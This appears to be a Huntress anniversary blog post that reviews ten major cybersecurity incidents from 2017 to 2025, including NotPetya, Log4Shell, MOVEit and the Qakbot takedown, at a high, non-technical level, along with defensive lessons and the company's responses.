The world of cybersecurity has been a wild ride over the last decade. As attackers stepped up their game year over year, the security community responded and adapted with resilience and ingenuity to each new wave of threats.
Attackers tested our limits time and time again with bolder, more cutting-edge cyberattacks: ransomware, supply chain compromises, zero-day vulnerabilities, and more. But every single breach, compromise, and exploited vulnerability taught us something new, pushed us harder to innovate and stay steps ahead, brought our security community closer together, and rallied us to wreck hackers.
As we celebrate our 10th anniversary at Huntress this month, we’re pausing to look back at the events that have shaped the entire cybersecurity community. Understanding where we've been is the first step to preparing for whatever comes next.
Here are the top 10 moments that defined cybersecurity over the last 10 years.
Our trip down memory lane starts on June 27, 2017. It began like any other Tuesday for businesses around the world. But by the end of the day, global supply chains were paralyzed, hospitals were forced offline, and shipping giant Maersk was operating with pen and paper across 76 ports worldwide.
The culprit of this chaos was the NotPetya attack. It spread like wildfire across victims’ networks, using the EternalBlue exploit. This exploit was based on a Microsoft zero-day flaw (CVE-2017-0144) and was also used in the WannaCry attack the month prior.
NotPetya initially targeted Ukrainian businesses, spreading through a compromised software update from M.E.Doc, a popular Ukrainian accounting program. But it quickly moved beyond the (likely) intended target region, causing massive global panic.
NotPetya masqueraded as ransomware, but hidden beneath the facade was something even more malicious: a destructive wiper designed to destroy data and wreck systems permanently. Companies faced weeks of operational downtime, lost business opportunities, and expensive recovery efforts, resulting in around $10 billion in losses.
The NotPetya attack marked a significant turning point in cybersecurity, redefining how the world understood nation-state cyber warfare and supply chain vulnerabilities:
Nation-state actors are willing to cause massive collateral damage to reach their goals, and traditional boundaries between military and commercial targets become meaningless
By targeting a single software provider, the attackers cast a massive targeting net that would be impossible through traditional network intrusion methods, emphasizing the true power of the supply chain
Regional conflicts can escalate into a global cyber ecosystem, regardless of the initial intent
Organizations finally realized they needed to consider not just direct threats to their systems, but also the potential for being caught in the crossfire of supply chain complications and geopolitical cyber conflicts.
Shortly after the NotPetya attack, one of the most devastating cybersecurity breaches in corporate history went down. In July 2017, Equifax realized it was the victim of a mega data breach that exposed the personal information of 147 million Americans. This breach has turned into a textbook example of how a single unpatched vulnerability can disrupt livelihoods, careers, and corporate reputations.
It all began with CVE-2017-5638, a critical vulnerability in Apache Struts 2, a popular web application framework. When the Apache Software Foundation announced this security flaw in March 2017, they immediately provided a patch, but, unfortunately, Equifax took a slower (and riskier) approach.
For two months, this known vulnerability sat exposed to the internet on Equifax's web application portal. Cybercriminals found the flaw in May 2017 and systematically extracted sensitive data until the breach was finally uncovered in July and publicly disclosed in September. In February 2020, the US Justice Department announced charges against four Chinese military-backed hackers in connection with the Equifax breach.
The Equifax breach exposed a fundamental cybersecurity challenge that persists for many organizations today: limited visibility into digital infrastructure, leading to unpatched and exposed digital assets. Threat actors understand these gaps and target overlooked assets because they're less likely to be monitored and patched consistently.
We all know that software updates make us safer. They patch vulnerabilities, add features, and keep our systems running smoothly. But what happens when the system designed to protect us becomes the cyber threat that attackers use against us?
The SolarWinds supply chain attack in December 2020 did exactly that, and exposed thousands of organizations to one of the most complex cyberattacks to date.
This monumental attack took advantage of a software update in the SolarWinds Orion platform. A compromised routine software update injected malicious code into the victims’ Orion software. Over several months, the attackers did reconnaissance, moved laterally, and found high-value targets in highly secure organizations before exploiting anything.
Almost 18,000 organizations worldwide received the compromised SolarWinds software update, including Fortune 500 companies and influential government agencies.
The SolarWinds attack was a major wake-up call for organizations to:
Run security assessments for suppliers, scrutinize their security practices, and set clear incident response (IR) guidelines for the supply chain companies you work with
Segment networks like crazy. Limit the vendor software’s access to critical systems and data
Use continuous monitoring, behavior analysis, and anomaly detection with machine learning support, not just traditional signature-based detections, to find strange patterns, even when they come from trusted sources
At Huntress, as our research and analysis of the SolarWinds attack unfolded, we published a blog sharing technical analysis from our security experts: breaking down the threat and why it was a big deal. We also created Huntress Monitored Files to identify which endpoints had backdoored files and to help uncover other future unknown binaries.
The Hafnium attack in March 2021 was the next major attack that shook defenders to the core. It’s attributed to a state-sponsored Chinese advanced persistent threat (APT) group, which exploited four critical zero-day vulnerabilities in on-premises Microsoft Exchange servers. These vulnerabilities, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, affected Exchange Server 2013, 2016, and 2019 and created a perfect storm of security weaknesses that attackers chained together for maximum impact.
The attack path was methodical and devastating. First, attackers exploited the server-side request forgery vulnerability (CVE-2021-26855) to authenticate as the Exchange server. Next, they used the remaining vulnerabilities for privilege escalation and remote code execution (RCE), taking control of the compromised Exchange environment. Once the vulnerabilities became public knowledge, other threat actors jumped in on the action, turning the situation into a full-blown global security crisis.
Microsoft Exchange Server is a critical technology for many organizations, and the Hafnium attacks highlighted:
The importance of asset inventory and patch management, especially for anything exposed to the internet
Continuous monitoring of systems, networks, and applications is non-negotiable
Investment in strong IR plans to control chaos in the aftermath of a hard-hitting cyberattack
Criticality of early detection and response for minimizing cyberattacks at scale
When chaos erupted across the threat landscape, our security experts at Huntress quickly joined the community response effort for our partners and customers. We spun up a rapid response blog with continuously updated detection scripts, in-depth technical analysis, and actionable guidance to help organizations respond to these attacks. This event solidified our commitment to always being on the front lines when our community needs us most.
May 2021 was a bumpy ride! On May 7, 2021, the Colonial Pipeline, responsible for carrying 45% of the US East Coast's fuel supply, went dark. Gas stations started running dry, and panic buying ensued. At the center of it all was a ransomware attack that would forever change how we think about cybersecurity and critical infrastructure.
The attack was attributed to DarkSide, a ransomware-as-a-service (RaaS) operation, which used a single compromised VPN password for an account that wasn’t in use at the time of the attack and that didn’t have multi-factor authentication (MFA) enabled. DarkSide ran their shady ransomware operations like a legitimate business with customer service, affiliate programs, and even a (questionable) code of ethics that allegedly prohibited attacks on hospitals and schools. They deemed critical infrastructure fair game, though.
DarkSide compromised Colonial Pipeline's networks and deployed their ransomware, encrypting vital systems and demanding approximately $4.4 million in Bitcoin. Colonial Pipeline faced an impossible choice: pay the ransom with no guarantee of full system recovery, or attempt to restore operations manually while fuel shortages spread across the eastern United States.
Colonial Pipeline quietly paid the ransom, but even after the payment was received, the company's systems remained offline for six days, creating the largest fuel supply disruption since Hurricane Sandy in October 2012.
The attack triggered an immediate and unprecedented US government response, and follow-up policy discussions focused on:
How a single point of failure in critical infrastructure has an immediate ripple effect on nationwide disruptions
The destructive power of ransomware can become a national security issue with real-world consequences
Ransomware operators who attack the systems, not just companies, that keep modern society running smoothly
The Colonial Pipeline attack was a sobering realization for the cybersecurity community, with lessons learned still important today:
Whether you’re a small business or an enterprise, you’re a target
The weakest link is always valuable and exploitable for attackers
Hackers are lazy, but they’re also agile and adaptable
Just when we thought 2021 couldn’t get any more demanding, attackers proved us wrong in the last few weeks of the year. A single vulnerability in a seemingly innocent Java logging library brought the digital world to its knees, forcing security teams into overdrive. This wasn't just another security flaw. It was Log4Shell, and it changed everything we thought we knew about software supply chain security.
The Log4j library might sound obscure, but trust us, it's everywhere! When security researchers discovered CVE-2021-44228, better known as Log4Shell, they uncovered a zero-day vulnerability so severe that it earned a perfect 10.0 CVSS score.
With the Log4Shell vulnerability, attackers executed remote code simply by getting a server to log a malicious string. It’s simple: send a crafted message to any application using the vulnerable Log4j library, and suddenly, you take complete control of that system.
Here’s where things got tricky. Nobody knew exactly where Log4j was running in their systems. For over a decade, it had been embedded in millions of applications and manufacturers, so the entire cybersecurity industry mobilized for what became one of the largest coordinated patching efforts in internet history.
In addition to the security risks of the open-source software ecosystem, this vulnerability exposed a harsh reality: you can't protect what you can't see. It pushed organizations to modernize their approach to third-party software security by:
Focusing on Software Bill of Materials (SBOM) and tracking detailed inventories of every component in software supply chains
Looking at every library, component, and piece of code as a potential attack surface
Setting up comprehensive software inventories, nurturing relationships with trusted security partners, and investing in automated vulnerability management systems
When Log4Shell started running rampant, we sprang into action with a blog to immediately inform the security community what was happening, who was impacted, and what Huntress was doing about it. To help our partners, customers, and security community, we shared detection guidance and threat intelligence, real-time patch advisories, and a tool for organizations to test if they were vulnerable to control the Log4Shell chaos.
From May to June 2023, the new face of supply chain ransomware attacks made its world debut. The cl0p ransomware gang exploited a zero-day SQL injection vulnerability (CVE-2023-34362) in Progress Software’s MOVEit managed file transfer (MFT) software, a tool for exchanging sensitive data. This triggered a cascade of breaches across hundreds of organizations worldwide, further changing how we think about third-party software vulnerabilities.
Instead of targeting individual companies like traditional ransomware operations, cl0p struck the heart of the software supply chain. By compromising MOVEit Transfer, they accessed data from every organization using the platform, creating a domino effect that reached far beyond their initial target. Healthcare systems, financial institutions, government agencies, and private companies fell victim to this single point of failure in MOVEit, which billed itself as a trusted third-party software solution.
This attack sheds light on the growth of ransomware attacks over the last 10 years. Instead of robbing individual houses, the threat actors upped the ante by compromising the security company that protects entire neighborhoods. One successful breach suddenly gave them access to hundreds of potential victims’ sensitive information simultaneously.
While many victims had solid internal security programs, these same security standards were lacking when it came to external vendors. The following security game plans for third-party vendors suddenly became critical security following the cl0p attacks:
Make vendor security assessments mandatory, with a focus on how vendors handle vulnerability disclosure, patch management, and incident response
Keep monitoring third-party vendors for security visibility with your networks after contracts are signed and systems are integrated
Update IR plans for breaches in third-party vendors
Recognizing the severity and scope of this threat, we immediately kicked into gear to support partners and the broader security community. We shared our technical analysis, investigation tips, indicators of attack (IOAs), links to additional community resources, and detection logic specifically designed to identify MOVEit-related threats.
When threats operate at this scale and magnitude, no organization can respond effectively alone. Community information sharing becomes critically important for incident response.
Check out these resources for more on our response to MOVEit exploitations:
After a decade of havoc, the Qakbot botnet empire finally crumbled in August 2023, thanks to an international coalition of law enforcement agencies. Operation Duck Hunt redirected Qakbot botnet traffic through law enforcement servers and sent uninstall files to machines infected with Qakbot.
So what exactly is Qakbot? For over a decade, this malware botnet infected hundreds of thousands of computers worldwide, turning them into unwitting participants in a vast criminal network. It was like a digital parasite, silently spreading through organizations to steal credentials, collect keystrokes, and create pathways for ransomware groups to launch their attacks. It typically spreads through seemingly innocent email attachments or links, often disguised as invoices, shipping notifications, or other business documents. It was designed to be dormant and maintain persistence while learning about the infected system and mapping out network connections to find high-value targets.
Authorities took the infamous Qakbot raid beyond digital boundaries, sending a clear signal to the cybercriminal community that they were invested in striking down not just the immediate threat but also the broader ecosystem that enabled Qakbot to thrive.
At Huntress, we’ve sent over 10,000 incident reports to date, dealing with Qakbot malware. That’s a lot (way too many, in fact), and by 2022, we decided to take things into our own hands for our partners and customers.
We quietly developed a Qakbot vaccine (so we wouldn’t tip off the bad guys) and rolled it out to all of our customers over two weeks. The results were phenomenal—new Qakbot infection reports dropped to nearly zero!
Learn more about our Qakbot analysis and how we built creative solutions against a long-lasting, pervasive malware botnet:
Let’s jump ahead to February 2024, when the cybersecurity community got inundated with tough reminders that malicious hackers were as ruthless as ever. ConnectWise ScreenConnect, a widely used remote monitoring and management (RMM) tool, was the latest company to warn of two critical vulnerabilities. What unfolded was an alarming, stereotypical example of how quickly threat actors can exploit security flaws, turning thousands of trusted software business tools into attack vectors.
CVE-2024-1709 and CVE-2024-1708 were a breeze for attackers to exploit:
CVE-2024-1709 (CVSS 10.0) was an authentication bypass that let attackers sidestep ScreenConnect’s authentication protocols
CVE-2024-1708, a significant path traversal vulnerability that when chained together with the successful exploitation of CVE-2024-1709, opened the door for remote code execution on the targeted device
The “SlashAndGrab” exploitation process, as we dubbed it, was shockingly simple. Attackers just needed basic knowledge of how to abuse these critical vulnerabilities.
Unfortunately, the aftermath was swift and brutal for victims, especially since RMMs are highly trusted tools in the security stack, and ScreenConnect automatically operates with elevated privileges across networks, making it a perfect launchpad for attackers to move laterally and compromise endpoints.
Victims were suddenly dealing with:
Ransomware deployments that encrypted critical business data
Cryptocurrency miners that hijacked system resources and degraded performance
Compromised remote access tools that provided persistent backdoors for future attacks
Data exfiltration that compromised sensitive client and business information
As mayhem attempted to take over the managed service provider (MSP) landscape, we knew we had to act quickly, so we doubled down on detection, analysis, and coordinated response efforts. This included finding the threat patterns connected to CVE-2024-1709/08 and developing detection mechanisms to help thousands of MSPs, internal IT teams, and the wider security community ease imminent risk.
This incident is a reality check that even the most established and trusted security solutions can quickly become your biggest pain point.
See more on our community response to the ScreenConnect vulnerabilities:
By mid-2025, it was about time to turn the tables and let threat actors feel the heat from international law enforcement agencies. In May, the next phase of Operation Endgame, which initially kicked off in 2024 by targeting dropper malware, declared victory when one of the most significant cybercriminal takedowns in history dismantled multiple malware networks that had plagued organizations for years.
This second iteration of Operation Endgame was a bold move to shut down an entire cybercrime-as-a-service ecosystem by targeting initial access malware, not just a single threat actor or malware family. Malware families that have infected millions of computers and have been tracked in the wild by our security researchers at Huntress were disrupted, including Qakbot, DanaBot, Lactrodectus, and Bumblebee.
The international scope of this operation was a massive win for the good guys. Agencies from the US, EU, UK, and other nations worked together to simultaneously take down over 300 servers, arrest major operators, and seize critical infrastructure components.
Thanks to Operation Endgame's success, multiple kingpin threat actors were indicted for developing, distributing, and profiting from cybercriminal enterprises. Unlike previous law enforcement interventions, attackers weren’t able to quickly relocate their operations to different jurisdictions and continue doing what they were doing.
Every major incident over the past decade taught us something new about resilience, adaptation, and the power of community-driven defense. From the rise of ransomware to sophisticated supply chain attacks, each challenge pushed us to innovate and grow stronger.
The underdogs we set out to protect 10 years ago face more sophisticated threats than ever before, but they also have access to sharper defensive tools. As we look toward the next decade, we're excited to continue evolving, learning, and growing alongside the community that makes our mission possible.
Hackers might be getting smarter, but so are we—and we're not fighting alone or slowing down anytime soon.
Special thanks to Beth Robinson and Lindsey O’Donnell-Welch for their contributions to this blog.
Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
